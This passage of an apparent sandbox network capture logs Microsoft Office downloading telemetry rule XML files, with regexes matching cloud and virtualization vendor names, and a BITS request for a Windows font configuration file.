2024-11-02 16:56:34 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.7	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:34 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:34 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:34 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 9919728d-d01e-002b-4b0b-2d25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165634Z-16547b76f7f22sh5hC1DFWyb4w00000000xg000000001x1p x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:34 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.7	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:34 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:34 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 275a5063-901e-0048-422e-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165634Z-r159446fcd78bmpqhC1DFW53gw00000001vg0000000086m9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:34 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49769	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:34 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-02 16:56:35 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF70) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=258547 Date: Sat, 02 Nov 2024 16:56:35 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.7	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:35 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:35 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 01e6ad6d-b01e-003d-6714-2cd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165635Z-176bd8f9bc5nnctdhC1DFWuuh800000002g000000000adfv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:35 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.7	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:35 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:35 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165635Z-16547b76f7fx6rhxhC1DFW76kg00000000u000000000hp1p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:35 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.7	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:35 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:35 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165635Z-16547b76f7fdf69shC1DFWcpd000000000v0000000008w17 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:35 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.7	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:35 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:35 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: e0ed28ce-c01e-0079-0d47-2ce51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165635Z-r159446fcd78bmpqhC1DFW53gw00000001vg0000000086n2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:35 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.7	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:35 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:35 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165635Z-16547b76f7fmbrhqhC1DFWkds800000000yg00000000b74u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:36 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49777	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-02 16:56:36 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=25928 Date: Sat, 02 Nov 2024 16:56:36 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-02 16:56:36 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.7	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:36 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: be0cd317-801e-008f-5625-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165636Z-176bd8f9bc56k8bfhC1DFWtzvn00000002k0000000000r0g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:36 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.7	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:36 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 2f3f951f-601e-0084-6012-2c6b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165636Z-r159446fcd7r47cfhC1DFW56w800000001p0000000002660 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:36 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.7	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:36 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:36 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165636Z-16547b76f7fwvr5dhC1DFW2c9400000000qg00000000nkdf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:36 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.7	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
